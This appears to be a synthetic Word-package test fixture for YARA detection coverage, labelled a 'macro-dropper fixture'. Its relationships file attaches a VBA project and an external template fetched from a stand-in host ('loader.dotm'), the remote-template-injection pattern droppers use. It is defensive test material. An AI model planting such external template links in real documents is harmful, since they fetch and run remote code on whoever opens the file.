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Default Extension="bas" ContentType="text/plain"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document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</Relationships>

</file>

<file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body>
    <w:p>
      <w:r>
        <w:t>Synthetic macro-dropper fixture for YARA coverage.</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document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vbaProject" Target="vbaProject.bin"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://example.com/loader.dotm" TargetMode="External"/>
</Relationships>
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macro-dropper fixture</dc:title>
  <dc:creator>Loupe test corpus</dc:creator>
</cp:coreProperties>
</file>